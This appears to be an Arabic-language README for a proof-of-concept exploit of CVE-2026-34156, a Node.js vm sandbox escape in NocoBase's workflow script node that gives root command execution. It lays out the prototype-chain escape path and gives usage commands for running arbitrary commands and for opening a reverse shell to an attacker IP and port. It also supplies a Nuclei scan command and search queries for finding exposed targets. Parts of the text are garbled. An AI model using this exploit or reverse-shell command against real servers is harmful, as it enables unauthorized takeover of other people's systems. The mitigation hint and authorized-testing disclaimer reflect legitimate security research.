
CVE-2026-34156
غير مصادق / صلاحيات منخفضة → تنفيذ أوامر عن بعد كجذر في NocoBase
CVE-2026-34156 هي ثغرة خطيرة في الهروب من الصندوق الرملي في NocoBase (منصة مفتوحة المصدر بدون كود/قليل الكود).
يمكن للمهاجم الذي لديه القدرة على إنشاء أو تنفيذ عقدة سكربت سير العمل (حتى بصلاحيات منخفضة) الهروب من الصندوق الرملي vm الخاص بـ Node.js وتحقيق تنفيذ أوامر عن بعد كامل كجذر داخل الحاوية.
@nocobase/plugin-workflow-javascript (عقدة السكربت)console._stdout.constructor.constructoruid=0)fs)كائن console الذي يتم تمريره إلى الصندوق الرملي هو من المضيف الحقيقي، مما يسمح للمهاجمين بتسلق سلسلة النماذج الأولية والوصول إلى دالة Function الحقيقية → process.mainModule.require.
# تنفيذ أمر بسيط
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"
# شل عكسي
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444
يتضمن المستودع: سكربت PoC كامل، قالب Nuclei، وأداة فحص آمنة.
nuclei -u https://target -t cves/CVE-2026-34156.yaml
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"
isolated-vm) في بيئة الإنتاج.
هذا المستودع لأغراض البحث الأمني التعليمي والمصرح به فقط.
استخدمه فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
الاستغلال غير المصرح به غير قانوني.
صنع بـ ❤️ لمجتمع الأمن
ابقَ آمنًا. طبق التحديثات بسرعة.